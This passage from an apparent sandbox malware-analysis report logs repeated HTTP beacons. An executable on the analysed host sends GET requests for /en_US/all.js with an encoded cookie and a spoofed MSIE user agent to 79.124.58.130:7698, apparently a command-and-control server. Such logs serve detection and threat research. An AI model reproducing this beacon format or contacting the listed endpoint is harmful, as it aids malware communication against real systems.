Oct 23, 2024 17:27:28.232875109 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:29.119442940 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.8	49819	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:29.255465031 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:30.385170937 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.8	49820	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:30.512023926 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:31.427607059 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.8	49821	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:31.573381901 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:32.472681999 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.8	49822	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:32.588932991 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:33.479599953 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.8	49823	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:33.604929924 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:34.493410110 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.8	49824	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:34.621889114 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:35.605948925 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.8	49825	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:35.731292009 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:36.626883984 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.8	49826	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:36.745342016 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:37.630381107 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.8	49827	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:37.763462067 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:38.650023937 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.8	49828	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:38.777206898 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:39.664586067 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.8	49829	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:39.792473078 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:40.698702097 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.8	49830	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:40.823162079 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:41.969357014 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.8	49831	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:42.088285923 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:42.985316992 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.8	49832	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:43.107458115 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:44.004170895 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.8	49833	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:44.122919083 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:45.002471924 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.8	49834	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:45.121009111 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:46.020327091 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.8	49835	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:46.136836052 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:47.029922009 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.8	49836	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:47.155597925 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:48.041570902 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.8	49837	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:48.155539036 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:49.042835951 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.8	49838	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:49.173845053 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:50.079205036 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.8	49839	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:50.200819969 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:51.101269960 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.8	49840	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:51.219774961 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:52.102122068 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.8	49841	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:52.214818001 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:53.098347902 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.8	49842	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:53.213886976 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:54.095227957 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.8	49843	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:54.215893984 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:55.108541965 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.8	49844	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:55.231817961 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:56.127742052 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.8	49845	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:56.465920925 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:57.402141094 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.8	49846	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:57.526540995 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:58.429080009 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.8	49847	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:27:58.550431967 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:27:59.437581062 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:27:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.8	49848	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
